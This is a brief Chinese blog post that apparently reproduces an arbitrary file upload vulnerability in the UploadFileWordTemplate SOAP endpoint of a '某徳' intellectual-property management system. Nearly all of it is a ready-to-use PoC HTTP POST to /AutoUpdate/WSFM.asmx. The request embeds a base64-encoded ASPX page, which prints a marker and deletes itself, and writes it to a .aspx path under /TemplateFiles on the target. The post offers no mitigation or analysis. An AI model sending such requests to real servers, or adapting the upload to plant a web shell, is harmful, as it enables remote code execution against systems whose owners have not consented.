「漏洞复现」某徳知识产权管理系统 UploadFileWordTemplate 文件上传漏洞-0x05 漏洞复现

2024-09-29 20:05:04

PoC

POST /AutoUpdate/WSFM.asmx HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/UploadFileWordTemplate"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <UploadFileWordTemplate xmlns="http://tempuri.org/">
              <fileByteArray>PCVAUGFnZSBMYW5ndWFnZT0iQyMiJT48JVJlc3BvbnNlLldyaXRlKCJwYm95am5ucmZpcG1wbHN1a2RlY3p1ZHNlZnhteXdlIik7U3lzdGVtLklPLkZpbGUuRGVsZXRlKFJlcXVlc3QuUGh5c2ljYWxQYXRoKTslPg==</fileByteArray>
      <remotePath>/TemplateFiles/{{username}}.aspx</remotePath>
    </UploadFileWordTemplate>
  </soap:Body>
</soap:Envelope>

上一篇:VB.NET中如何利用LINQ to SQL进行数据库操作


下一篇:Ego微商小程序项目实战4.0【环境搭建】